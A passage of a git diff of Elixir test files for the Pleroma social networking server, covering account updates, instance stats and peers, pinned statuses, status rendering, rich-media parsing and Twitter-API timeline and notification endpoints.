	assert user = json_response(conn, 200)

	assert user["note"] ==
	- "I drink <a data-tag=\"cofe\" href=\"http://localhost:4001/tag/cofe\">#cofe</a> with <span><a data-user=\"#{
	+ "I drink <a class=\"hashtag\" data-tag=\"cofe\" href=\"http://localhost:4001/tag/cofe\">#cofe</a> with <span class=\"h-card\"><a data-user=\"#{
	user2.id
	- }\" href=\"#{user2.ap_id}\">@<span>#{user2.nickname}</span></a></span>"
	+ }\" class=\"u-url mention\" href=\"#{user2.ap_id}\">@<span>#{user2.nickname}</span></a></span>"
	end

	test "updates the user's locking status", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> patch("/api/v1/accounts/update_credentials", %{locked: "true"})

	assert user = json_response(conn, 200)
	assert user["locked"] == true
	end

	test "updates the user's name", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> patch("/api/v1/accounts/update_credentials", %{"display_name" => "markorepairs"})

	assert user = json_response(conn, 200)
	assert user["display_name"] == "markorepairs"
	end

	test "updates the user's avatar", %{conn: conn} do
	user = insert(:user)

	new_avatar = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image.jpg"),
	filename: "an_image.jpg"
	}

	conn =
	conn
	\|> assign(:user, user)
	\|> patch("/api/v1/accounts/update_credentials", %{"avatar" => new_avatar})

	assert user_response = json_response(conn, 200)
	assert user_response["avatar"] != User.avatar_url(user)
	end

	test "updates the user's banner", %{conn: conn} do
	user = insert(:user)

	new_header = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image.jpg"),
	filename: "an_image.jpg"
	}

	conn =
	conn
	\|> assign(:user, user)
	\|> patch("/api/v1/accounts/update_credentials", %{"header" => new_header})

	assert user_response = json_response(conn, 200)
	assert user_response["header"] != User.banner_url(user)
	end
	end

	test "get instance information", %{conn: conn} do
	- insert(:user, %{local: true})
	user = insert(:user, %{local: true})
	- insert(:user, %{local: false})
	+
	+ user2 = insert(:user, %{local: true})
	+ {:ok, _user2} = User.deactivate(user2, !user2.info.deactivated)
	+
	+ insert(:user, %{local: false, nickname: "u@peer1.com"})
	+ insert(:user, %{local: false, nickname: "u@peer2.com"})

	{:ok, _} = TwitterAPI.create_status(user, %{"status" => "cofe"})

	Pleroma.Stats.update_stats()

	- conn =
	- conn
	- \|> get("/api/v1/instance")
	+ conn = get(conn, "/api/v1/instance")
	+
	+ assert result = json_response(conn, 200)
	+
	+ stats = result["stats"]
	+
	+ assert stats
	+ assert stats["user_count"] == 1
	+ assert stats["status_count"] == 1
	+ assert stats["domain_count"] == 2
	+ end
	+
	+ test "get peers", %{conn: conn} do
	+ insert(:user, %{local: false, nickname: "u@peer1.com"})
	+ insert(:user, %{local: false, nickname: "u@peer2.com"})
	+
	+ Pleroma.Stats.update_stats()
	+
	+ conn = get(conn, "/api/v1/instance/peers")

	assert result = json_response(conn, 200)

	- assert result["stats"]["user_count"] == 2
	- assert result["stats"]["status_count"] == 1
	+ assert ["peer1.com", "peer2.com"] == Enum.sort(result)
	end

	test "put settings", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> put("/api/web/settings", %{"data" => %{"programming" => "socks"}})

	- assert result = json_response(conn, 200)
	+ assert _result = json_response(conn, 200)

	user = User.get_cached_by_ap_id(user.ap_id)
	assert user.info.settings == %{"programming" => "socks"}
	end

	describe "pinned statuses" do
	setup do
	Pleroma.Config.put([:instance, :max_pinned_statuses], 1)

	user = insert(:user)
	{:ok, activity} = CommonAPI.post(user, %{"status" => "HI!!!"})

	[user: user, activity: activity]
	end

	test "returns pinned statuses", %{conn: conn, user: user, activity: activity} do
	{:ok, _} = CommonAPI.pin(activity.id, user)

	result =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/#{user.id}/statuses?pinned=true")
	\|> json_response(200)

	id_str = to_string(activity.id)

	assert [%{"id" => ^id_str, "pinned" => true}] = result
	end

	test "pin status", %{conn: conn, user: user, activity: activity} do
	id_str = to_string(activity.id)

	assert %{"id" => ^id_str, "pinned" => true} =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{activity.id}/pin")
	\|> json_response(200)

	assert [%{"id" => ^id_str, "pinned" => true}] =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/#{user.id}/statuses?pinned=true")
	\|> json_response(200)
	end

	test "unpin status", %{conn: conn, user: user, activity: activity} do
	{:ok, _} = CommonAPI.pin(activity.id, user)

	id_str = to_string(activity.id)
	user = refresh_record(user)

	assert %{"id" => ^id_str, "pinned" => false} =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{activity.id}/unpin")
	\|> json_response(200)

	assert [] =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/#{user.id}/statuses?pinned=true")
	\|> json_response(200)
	end

	test "max pinned statuses", %{conn: conn, user: user, activity: activity_one} do
	{:ok, activity_two} = CommonAPI.post(user, %{"status" => "HI!!!"})

	id_str_one = to_string(activity_one.id)

	assert %{"id" => ^id_str_one, "pinned" => true} =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{id_str_one}/pin")
	\|> json_response(200)

	user = refresh_record(user)

	assert %{"error" => "You have already pinned the maximum number of statuses"} =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{activity_two.id}/pin")
	\|> json_response(400)
	end
	end
	end
	diff --git a/test/web/mastodon_api/status_view_test.exs b/test/web/mastodon_api/status_view_test.exs
	index 1076b5002..d30ae6149 100644
	--- a/test/web/mastodon_api/status_view_test.exs
	+++ b/test/web/mastodon_api/status_view_test.exs
	@@ -1,203 +1,233 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2018 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.MastodonAPI.StatusViewTest do
	use Pleroma.DataCase

	alias Pleroma.Web.MastodonAPI.{StatusView, AccountView}
	alias Pleroma.User
	alias Pleroma.Web.OStatus
	alias Pleroma.Web.CommonAPI
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Activity
	import Pleroma.Factory
	import Tesla.Mock

	setup do
	mock(fn env -> apply(HttpRequestMock, :request, [env]) end)
	:ok
	end

	+ test "returns a temporary ap_id based user for activities missing db users" do
	+ user = insert(:user)
	+
	+ {:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!", "visibility" => "direct"})
	+
	+ Repo.delete(user)
	+ Cachex.clear(:user_cache)
	+
	+ %{account: ms_user} = StatusView.render("status.json", activity: activity)
	+
	+ assert ms_user.acct == "erroruser@example.com"
	+ end
	+
	+ test "tries to get a user by nickname if fetching by ap_id doesn't work" do
	+ user = insert(:user)
	+
	+ {:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!", "visibility" => "direct"})
	+
	+ {:ok, user} =
	+ user
	+ \|> Ecto.Changeset.change(%{ap_id: "#{user.ap_id}/extension/#{user.nickname}"})
	+ \|> Repo.update()
	+
	+ Cachex.clear(:user_cache)
	+
	+ result = StatusView.render("status.json", activity: activity)
	+
	+ assert result[:account][:id] == to_string(user.id)
	+ end
	+
	test "a note with null content" do
	note = insert(:note_activity)

	data =
	note.data
	\|> put_in(["object", "content"], nil)

	note =
	note
	\|> Map.put(:data, data)

	User.get_cached_by_ap_id(note.data["actor"])

	status = StatusView.render("status.json", %{activity: note})

	assert status.content == ""
	end

	test "a note activity" do
	note = insert(:note_activity)
	user = User.get_cached_by_ap_id(note.data["actor"])

	status = StatusView.render("status.json", %{activity: note})

	created_at =
	(note.data["object"]["published"] \|\| "")
	\|> String.replace(~r/\.\d+Z/, ".000Z")

	expected = %{
	id: to_string(note.id),
	uri: note.data["object"]["id"],
	url: note.data["object"]["id"],
	account: AccountView.render("account.json", %{user: user}),
	in_reply_to_id: nil,
	in_reply_to_account_id: nil,
	reblog: nil,
	content: HtmlSanitizeEx.basic_html(note.data["object"]["content"]),
	created_at: created_at,
	reblogs_count: 0,
	replies_count: 0,
	favourites_count: 0,
	reblogged: false,
	favourited: false,
	muted: false,
	pinned: false,
	sensitive: false,
	spoiler_text: note.data["object"]["summary"],
	visibility: "public",
	media_attachments: [],
	mentions: [],
	tags: [
	%{
	name: "#{note.data["object"]["tag"]}",
	url: "/tag/#{note.data["object"]["tag"]}"
	}
	],
	application: %{
	name: "Web",
	website: nil
	},
	language: nil,
	emojis: [
	%{
	shortcode: "2hu",
	url: "corndog.png",
	static_url: "corndog.png",
	visible_in_picker: false
	}
	]
	}

	assert status == expected
	end

	test "a reply" do
	note = insert(:note_activity)
	user = insert(:user)

	{:ok, activity} =
	CommonAPI.post(user, %{"status" => "he", "in_reply_to_status_id" => note.id})

	status = StatusView.render("status.json", %{activity: activity})

	assert status.in_reply_to_id == to_string(note.id)

	[status] = StatusView.render("index.json", %{activities: [activity], as: :activity})

	assert status.in_reply_to_id == to_string(note.id)
	end

	test "contains mentions" do
	incoming = File.read!("test/fixtures/incoming_reply_mastodon.xml")
	# a user with this ap id might be in the cache.
	recipient = "https://pleroma.soykaf.com/users/lain"
	user = insert(:user, %{ap_id: recipient})

	{:ok, [activity]} = OStatus.handle_incoming(incoming)

	status = StatusView.render("status.json", %{activity: activity})

	assert status.mentions == [AccountView.render("mention.json", %{user: user})]
	end

	test "attachments" do
	object = %{
	"type" => "Image",
	"url" => [
	%{
	"mediaType" => "image/png",
	"href" => "someurl"
	}
	],
	"uuid" => 6
	}

	expected = %{
	id: "1638338801",
	type: "image",
	url: "someurl",
	remote_url: "someurl",
	preview_url: "someurl",
	text_url: "someurl",
	description: nil
	}

	assert expected == StatusView.render("attachment.json", %{attachment: object})

	# If theres a "id", use that instead of the generated one
	object = Map.put(object, "id", 2)
	assert %{id: "2"} = StatusView.render("attachment.json", %{attachment: object})
	end

	test "a reblog" do
	user = insert(:user)
	activity = insert(:note_activity)

	{:ok, reblog, _} = CommonAPI.repeat(activity.id, user)

	represented = StatusView.render("status.json", %{for: user, activity: reblog})

	assert represented[:id] == to_string(reblog.id)
	assert represented[:reblog][:id] == to_string(activity.id)
	assert represented[:emojis] == []
	end

	test "a peertube video" do
	user = insert(:user)

	{:ok, object} =
	ActivityPub.fetch_object_from_id(
	"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3"
	)

	%Activity{} = activity = Activity.get_create_activity_by_object_ap_id(object.data["id"])

	represented = StatusView.render("status.json", %{for: user, activity: activity})

	assert represented[:id] == to_string(activity.id)
	assert length(represented[:media_attachments]) == 1
	end

	describe "build_tags/1" do
	test "it returns a a dictionary tags" do
	object_tags = [
	"fediverse",
	"mastodon",
	"nextcloud",
	%{
	"href" => "https://kawen.space/users/lain",
	"name" => "@lain@kawen.space",
	"type" => "Mention"
	}
	]

	assert StatusView.build_tags(object_tags) == [
	%{name: "fediverse", url: "/tag/fediverse"},
	%{name: "mastodon", url: "/tag/mastodon"},
	%{name: "nextcloud", url: "/tag/nextcloud"}
	]
	end
	end
	end
	diff --git a/test/web/rich_media/parser_test.exs b/test/web/rich_media/parser_test.exs
	index ff3486a6d..e14b5061a 100644
	--- a/test/web/rich_media/parser_test.exs
	+++ b/test/web/rich_media/parser_test.exs
	@@ -1,51 +1,92 @@
	defmodule Pleroma.Web.RichMedia.ParserTest do
	use ExUnit.Case, async: true

	setup do
	Tesla.Mock.mock(fn
	%{
	method: :get,
	url: "http://example.com/ogp"
	} ->
	%Tesla.Env{status: 200, body: File.read!("test/fixtures/rich_media/ogp.html")}

	%{
	method: :get,
	url: "http://example.com/twitter-card"
	} ->
	%Tesla.Env{status: 200, body: File.read!("test/fixtures/rich_media/twitter_card.html")}

	+ %{
	+ method: :get,
	+ url: "http://example.com/oembed"
	+ } ->
	+ %Tesla.Env{status: 200, body: File.read!("test/fixtures/rich_media/oembed.html")}
	+
	+ %{
	+ method: :get,
	+ url: "http://example.com/oembed.json"
	+ } ->
	+ %Tesla.Env{status: 200, body: File.read!("test/fixtures/rich_media/oembed.json")}
	+
	%{method: :get, url: "http://example.com/empty"} ->
	%Tesla.Env{status: 200, body: "hello"}
	end)

	:ok
	end

	test "returns error when no metadata present" do
	assert {:error, _} = Pleroma.Web.RichMedia.Parser.parse("http://example.com/empty")
	end

	test "parses ogp" do
	assert Pleroma.Web.RichMedia.Parser.parse("http://example.com/ogp") ==
	{:ok,
	%{
	image: "http://ia.media-imdb.com/images/rock.jpg",
	title: "The Rock",
	type: "video.movie",
	url: "http://www.imdb.com/title/tt0117500/"
	}}
	end

	test "parses twitter card" do
	assert Pleroma.Web.RichMedia.Parser.parse("http://example.com/twitter-card") ==
	{:ok,
	%{
	card: "summary",
	site: "@flickr",
	image: "https://farm6.staticflickr.com/5510/14338202952_93595258ff_z.jpg",
	title: "Small Island Developing States Photo Submission",
	description: "View the album on Flickr."
	}}
	end
	+
	+ test "parses OEmbed" do
	+ assert Pleroma.Web.RichMedia.Parser.parse("http://example.com/oembed") ==
	+ {:ok,
	+ %{
	+ "author_name" => "‮‭‬bees‬",
	+ "author_url" => "https://www.flickr.com/photos/bees/",
	+ "cache_age" => 3600,
	+ "flickr_type" => "photo",
	+ "height" => "768",
	+ "html" =>
	+ "<a data-flickr-embed=\"true\" href=\"https://www.flickr.com/photos/bees/2362225867/\" title=\"Bacon Lollys by ‮‭‬bees‬, on Flickr\"><img src=\"https://farm4.staticflickr.com/3040/2362225867_4a87ab8baf_b.jpg\" width=\"1024\" height=\"768\" alt=\"Bacon Lollys\"></a><script async src=\"https://embedr.flickr.com/assets/client-code.js\" charset=\"utf-8\"></script>",
	+ "license" => "All Rights Reserved",
	+ "license_id" => 0,
	+ "provider_name" => "Flickr",
	+ "provider_url" => "https://www.flickr.com/",
	+ "thumbnail_height" => 150,
	+ "thumbnail_url" =>
	+ "https://farm4.staticflickr.com/3040/2362225867_4a87ab8baf_q.jpg",
	+ "thumbnail_width" => 150,
	+ "title" => "Bacon Lollys",
	+ "type" => "photo",
	+ "url" => "https://farm4.staticflickr.com/3040/2362225867_4a87ab8baf_b.jpg",
	+ "version" => "1.0",
	+ "web_page" => "https://www.flickr.com/photos/bees/2362225867/",
	+ "web_page_short_url" => "https://flic.kr/p/4AK2sc",
	+ "width" => "1024"
	+ }}
	+ end
	end
	diff --git a/test/web/twitter_api/twitter_api_controller_test.exs b/test/web/twitter_api/twitter_api_controller_test.exs
	index 5f13e7959..e08edc525 100644
	--- a/test/web/twitter_api/twitter_api_controller_test.exs
	+++ b/test/web/twitter_api/twitter_api_controller_test.exs
	@@ -1,1823 +1,1823 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.TwitterAPI.ControllerTest do
	use Pleroma.Web.ConnCase
	alias Pleroma.Web.TwitterAPI.Representers.ActivityRepresenter
	alias Pleroma.Builders.{ActivityBuilder, UserBuilder}
	alias Pleroma.{Repo, Activity, User, Object, Notification}
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.TwitterAPI.UserView
	alias Pleroma.Web.TwitterAPI.NotificationView
	alias Pleroma.Web.CommonAPI
	alias Pleroma.Web.TwitterAPI.TwitterAPI
	alias Comeonin.Pbkdf2
	alias Ecto.Changeset

	import Pleroma.Factory

	@banner "data:image/gif;base64,R0lGODlhEAAQAMQAAORHHOVSKudfOulrSOp3WOyDZu6QdvCchPGolfO0o/XBs/fNwfjZ0frl3/zy7////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAkAABAALAAAAAAQABAAAAVVICSOZGlCQAosJ6mu7fiyZeKqNKToQGDsM8hBADgUXoGAiqhSvp5QAnQKGIgUhwFUYLCVDFCrKUE1lBavAViFIDlTImbKC5Gm2hB0SlBCBMQiB0UjIQA7"

	describe "POST /api/account/update_profile_banner" do
	test "it updates the banner", %{conn: conn} do
	user = insert(:user)

	conn
	\|> assign(:user, user)
	\|> post(authenticated_twitter_api__path(conn, :update_banner), %{"banner" => @banner})
	\|> json_response(200)

	user = refresh_record(user)
	assert user.info.banner["type"] == "Image"
	end
	end

	describe "POST /api/qvitter/update_background_image" do
	test "it updates the background", %{conn: conn} do
	user = insert(:user)

	conn
	\|> assign(:user, user)
	\|> post(authenticated_twitter_api__path(conn, :update_background), %{"img" => @banner})
	\|> json_response(200)

	user = refresh_record(user)
	assert user.info.background["type"] == "Image"
	end
	end

	describe "POST /api/account/verify_credentials" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/account/verify_credentials.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: user} do
	response =
	conn
	\|> with_credentials(user.nickname, "test")
	\|> post("/api/account/verify_credentials.json")
	\|> json_response(200)

	assert response == UserView.render("show.json", %{user: user, token: response["token"]})
	end
	end

	describe "POST /statuses/update.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/statuses/update.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: user} do
	conn_with_creds = conn \|> with_credentials(user.nickname, "test")
	request_path = "/api/statuses/update.json"

	error_response = %{
	"request" => request_path,
	"error" => "Client must provide a 'status' parameter with a value."
	}

	conn =
	conn_with_creds
	\|> post(request_path)

	assert json_response(conn, 400) == error_response

	conn =
	conn_with_creds
	\|> post(request_path, %{status: ""})

	assert json_response(conn, 400) == error_response

	conn =
	conn_with_creds
	\|> post(request_path, %{status: " "})

	assert json_response(conn, 400) == error_response

	# we post with visibility private in order to avoid triggering relay
	conn =
	conn_with_creds
	\|> post(request_path, %{status: "Nice meme.", visibility: "private"})

	assert json_response(conn, 200) ==
	ActivityRepresenter.to_map(Repo.one(Activity), %{user: user})
	end
	end

	describe "GET /statuses/public_timeline.json" do
	setup [:valid_user]

	test "returns statuses", %{conn: conn} do
	user = insert(:user)
	activities = ActivityBuilder.insert_list(30, %{}, %{user: user})
	ActivityBuilder.insert_list(10, %{}, %{user: user})
	since_id = List.last(activities).id

	conn =
	conn
	\|> get("/api/statuses/public_timeline.json", %{since_id: since_id})

	response = json_response(conn, 200)

	assert length(response) == 10
	end

	test "returns 403 to unauthenticated request when the instance is not public", %{conn: conn} do
	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, false)

	Application.put_env(:pleroma, :instance, instance)

	conn
	\|> get("/api/statuses/public_timeline.json")
	\|> json_response(403)

	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, true)

	Application.put_env(:pleroma, :instance, instance)
	end

	test "returns 200 to authenticated request when the instance is not public",
	%{conn: conn, user: user} do
	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, false)

	Application.put_env(:pleroma, :instance, instance)

	conn
	\|> with_credentials(user.nickname, "test")
	\|> get("/api/statuses/public_timeline.json")
	\|> json_response(200)

	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, true)

	Application.put_env(:pleroma, :instance, instance)
	end

	test "returns 200 to unauthenticated request when the instance is public", %{conn: conn} do
	conn
	\|> get("/api/statuses/public_timeline.json")
	\|> json_response(200)
	end

	test "returns 200 to authenticated request when the instance is public",
	%{conn: conn, user: user} do
	conn
	\|> with_credentials(user.nickname, "test")
	\|> get("/api/statuses/public_timeline.json")
	\|> json_response(200)
	end
	end

	describe "GET /statuses/public_and_external_timeline.json" do
	setup [:valid_user]

	test "returns 403 to unauthenticated request when the instance is not public", %{conn: conn} do
	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, false)

	Application.put_env(:pleroma, :instance, instance)

	conn
	\|> get("/api/statuses/public_and_external_timeline.json")
	\|> json_response(403)

	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, true)

	Application.put_env(:pleroma, :instance, instance)
	end

	test "returns 200 to authenticated request when the instance is not public",
	%{conn: conn, user: user} do
	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, false)

	Application.put_env(:pleroma, :instance, instance)

	conn
	\|> with_credentials(user.nickname, "test")
	\|> get("/api/statuses/public_and_external_timeline.json")
	\|> json_response(200)

	instance =
	Application.get_env(:pleroma, :instance)
	\|> Keyword.put(:public, true)

	Application.put_env(:pleroma, :instance, instance)
	end

	test "returns 200 to unauthenticated request when the instance is public", %{conn: conn} do
	conn
	\|> get("/api/statuses/public_and_external_timeline.json")
	\|> json_response(200)
	end

	test "returns 200 to authenticated request when the instance is public",
	%{conn: conn, user: user} do
	conn
	\|> with_credentials(user.nickname, "test")
	\|> get("/api/statuses/public_and_external_timeline.json")
	\|> json_response(200)
	end
	end

	describe "GET /statuses/show/:id.json" do
	test "returns one status", %{conn: conn} do
	user = insert(:user)
	{:ok, activity} = CommonAPI.post(user, %{"status" => "Hey!"})
	actor = Repo.get_by!(User, ap_id: activity.data["actor"])

	conn =
	conn
	\|> get("/api/statuses/show/#{activity.id}.json")

	response = json_response(conn, 200)

	assert response == ActivityRepresenter.to_map(activity, %{user: actor})
	end
	end

	describe "GET /users/show.json" do
	test "gets user with screen_name", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> get("/api/users/show.json", %{"screen_name" => user.nickname})

	response = json_response(conn, 200)

	assert response["id"] == user.id
	end

	test "gets user with user_id", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> get("/api/users/show.json", %{"user_id" => user.id})

	response = json_response(conn, 200)

	assert response["id"] == user.id
	end

	test "gets a user for a logged in user", %{conn: conn} do
	user = insert(:user)
	logged_in = insert(:user)

	{:ok, logged_in, user, _activity} = TwitterAPI.follow(logged_in, %{"user_id" => user.id})

	conn =
	conn
	\|> with_credentials(logged_in.nickname, "test")
	\|> get("/api/users/show.json", %{"user_id" => user.id})

	response = json_response(conn, 200)

	assert response["following"] == true
	end
	end

	describe "GET /statusnet/conversation/:id.json" do
	test "returns the statuses in the conversation", %{conn: conn} do
	{:ok, _user} = UserBuilder.insert()
	{:ok, activity} = ActivityBuilder.insert(%{"type" => "Create", "context" => "2hu"})
	{:ok, _activity_two} = ActivityBuilder.insert(%{"type" => "Create", "context" => "2hu"})
	{:ok, _activity_three} = ActivityBuilder.insert(%{"type" => "Create", "context" => "3hu"})

	conn =
	conn
	\|> get("/api/statusnet/conversation/#{activity.data["context_id"]}.json")

	response = json_response(conn, 200)

	assert length(response) == 2
	end
	end

	describe "GET /statuses/friends_timeline.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = get(conn, "/api/statuses/friends_timeline.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	user = insert(:user)

	activities =
	ActivityBuilder.insert_list(30, %{"to" => [User.ap_followers(user)]}, %{user: user})

	returned_activities =
	ActivityBuilder.insert_list(10, %{"to" => [User.ap_followers(user)]}, %{user: user})

	other_user = insert(:user)
	ActivityBuilder.insert_list(10, %{}, %{user: other_user})
	since_id = List.last(activities).id

	current_user =
	Changeset.change(current_user, following: [User.ap_followers(user)])
	\|> Repo.update!()

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/statuses/friends_timeline.json", %{since_id: since_id})

	response = json_response(conn, 200)

	assert length(response) == 10

	assert response ==
	Enum.map(returned_activities, fn activity ->
	ActivityRepresenter.to_map(activity, %{
	user: User.get_cached_by_ap_id(activity.data["actor"]),
	for: current_user
	})
	end)
	end
	end

	describe "GET /statuses/dm_timeline.json" do
	test "it show direct messages", %{conn: conn} do
	user_one = insert(:user)
	user_two = insert(:user)

	{:ok, user_two} = User.follow(user_two, user_one)

	{:ok, direct} =
	CommonAPI.post(user_one, %{
	"status" => "Hi @#{user_two.nickname}!",
	"visibility" => "direct"
	})

	{:ok, direct_two} =
	CommonAPI.post(user_two, %{
	"status" => "Hi @#{user_one.nickname}!",
	"visibility" => "direct"
	})

	{:ok, _follower_only} =
	CommonAPI.post(user_one, %{
	"status" => "Hi @#{user_two.nickname}!",
	"visibility" => "private"
	})

	# Only direct should be visible here
	res_conn =
	conn
	\|> assign(:user, user_two)
	\|> get("/api/statuses/dm_timeline.json")

	[status, status_two] = json_response(res_conn, 200)
	assert status["id"] == direct_two.id
	assert status_two["id"] == direct.id
	end
	end

	describe "GET /statuses/mentions.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = get(conn, "/api/statuses/mentions.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	{:ok, activity} =
	ActivityBuilder.insert(%{"to" => [current_user.ap_id]}, %{user: current_user})

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/statuses/mentions.json")

	response = json_response(conn, 200)

	assert length(response) == 1

	assert Enum.at(response, 0) ==
	ActivityRepresenter.to_map(activity, %{
	user: current_user,
	mentioned: [current_user]
	})
	end
	end

	describe "GET /api/qvitter/statuses/notifications.json" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = get(conn, "/api/qvitter/statuses/notifications.json")
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials", %{conn: conn, user: current_user} do
	other_user = insert(:user)

	{:ok, _activity} =
	ActivityBuilder.insert(%{"to" => [current_user.ap_id]}, %{user: other_user})

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/qvitter/statuses/notifications.json")

	response = json_response(conn, 200)

	assert length(response) == 1

	assert response ==
	NotificationView.render("notification.json", %{
	notifications: Notification.for_user(current_user),
	for: current_user
	})
	end
	end

	describe "POST /api/qvitter/statuses/notifications/read" do
	setup [:valid_user]

	test "without valid credentials", %{conn: conn} do
	conn = post(conn, "/api/qvitter/statuses/notifications/read", %{"latest_id" => 1_234_567})
	assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
	end

	test "with credentials, without any params", %{conn: conn, user: current_user} do
	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/qvitter/statuses/notifications/read")

	assert json_response(conn, 400) == %{
	"error" => "You need to specify latest_id",
	"request" => "/api/qvitter/statuses/notifications/read"
	}
	end

	test "with credentials, with params", %{conn: conn, user: current_user} do
	other_user = insert(:user)

	{:ok, _activity} =
	ActivityBuilder.insert(%{"to" => [current_user.ap_id]}, %{user: other_user})

	response_conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/qvitter/statuses/notifications.json")

	[notification] = response = json_response(response_conn, 200)

	assert length(response) == 1

	assert notification["is_seen"] == 0

	response_conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> post("/api/qvitter/statuses/notifications/read", %{"latest_id" => notification["id"]})

	[notification] = response = json_response(response_conn, 200)

	assert length(response) == 1

	assert notification["is_seen"] == 1
	end
	end

	describe "GET /statuses/user_timeline.json" do
	setup [:valid_user]

	test "without any params", %{conn: conn} do
	conn = get(conn, "/api/statuses/user_timeline.json")

	assert json_response(conn, 400) == %{
	"error" => "You need to specify screen_name or user_id",
	"request" => "/api/statuses/user_timeline.json"
	}
	end

	test "with user_id", %{conn: conn} do
	user = insert(:user)
	{:ok, activity} = ActivityBuilder.insert(%{"id" => 1}, %{user: user})

	conn = get(conn, "/api/statuses/user_timeline.json", %{"user_id" => user.id})
	response = json_response(conn, 200)
	assert length(response) == 1
	assert Enum.at(response, 0) == ActivityRepresenter.to_map(activity, %{user: user})
	end

	test "with screen_name", %{conn: conn} do
	user = insert(:user)
	{:ok, activity} = ActivityBuilder.insert(%{"id" => 1}, %{user: user})

	conn = get(conn, "/api/statuses/user_timeline.json", %{"screen_name" => user.nickname})
	response = json_response(conn, 200)
	assert length(response) == 1
	assert Enum.at(response, 0) == ActivityRepresenter.to_map(activity, %{user: user})
	end

	test "with credentials", %{conn: conn, user: current_user} do
	{:ok, activity} = ActivityBuilder.insert(%{"id" => 1}, %{user: current_user})

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/statuses/user_timeline.json")

	response = json_response(conn, 200)

	assert length(response) == 1
	assert Enum.at(response, 0) == ActivityRepresenter.to_map(activity, %{user: current_user})
	end

	test "with credentials with user_id", %{conn: conn, user: current_user} do
	user = insert(:user)
	{:ok, activity} = ActivityBuilder.insert(%{"id" => 1}, %{user: user})

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/statuses/user_timeline.json", %{"user_id" => user.id})

	response = json_response(conn, 200)

	assert length(response) == 1
	assert Enum.at(response, 0) == ActivityRepresenter.to_map(activity, %{user: user})
	end

	test "with credentials screen_name", %{conn: conn, user: current_user} do
	user = insert(:user)
	{:ok, activity} = ActivityBuilder.insert(%{"id" => 1}, %{user: user})

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/statuses/user_timeline.json", %{"screen_name" => user.nickname})

	response = json_response(conn, 200)

	assert length(response) == 1
	assert Enum.at(response, 0) == ActivityRepresenter.to_map(activity, %{user: user})
	end

	test "with credentials with user_id, excluding RTs", %{conn: conn, user: current_user} do
	user = insert(:user)
	{:ok, activity} = ActivityBuilder.insert(%{"id" => 1, "type" => "Create"}, %{user: user})
	{:ok, _} = ActivityBuilder.insert(%{"id" => 2, "type" => "Announce"}, %{user: user})

	conn =
	conn
	\|> with_credentials(current_user.nickname, "test")
	\|> get("/api/statuses/user_timeline.json", %{
	"user_id" => user.id,
	"include_rts" => "false"
	})

	response = json_response(conn, 200)

	assert length(response) == 1
